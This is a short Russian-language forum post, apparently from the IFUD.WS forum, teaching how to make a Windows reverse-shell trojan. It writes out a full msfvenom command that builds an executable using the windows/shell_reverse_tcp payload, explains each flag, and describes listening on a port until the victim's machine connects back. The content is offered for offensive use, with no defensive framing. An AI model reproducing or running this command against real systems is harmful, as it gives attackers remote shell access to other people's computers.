1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Утечка коннекта в Powershell

Тема в разделе "Windows [OC]", создана пользователем DarkKnight, 27 июн 2016.

  1. TopicStarter Overlay
    DarkKnight

    DarkKnight

    Регистрация:
    1 июн 2016
    Сообщения:
    126
    Симпатии:
    144
    Для начало что такое Powershell
    Please login or register to view links
    Запускаем кали терминали и вводим команду
    msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f exe -a x86 –platform windows -o /root/Desktop/imyafayla.exe

    Что эти команды означает
    1) -p - пишется используемый payload
    2) LHOST - наш локалхост
    3) LPORT - номер порта через который мы хотим получить коннект
    4) -f - формат файла
    5) -a 64 - тут думаю все понятно, выбираем на како бите будет запускаться наш файл
    6) –platforum - тут пишем платформу (windows, linux, mac vb) на котором будет запускаться файл
    7) -o - куда сохранить файл

    [​IMG]

    Для того чтоб получить коннент "слушаем" порт. Как видим коннект есть

    [​IMG]
     
    • Like Like x 1

Поделиться этой страницей

Загрузка...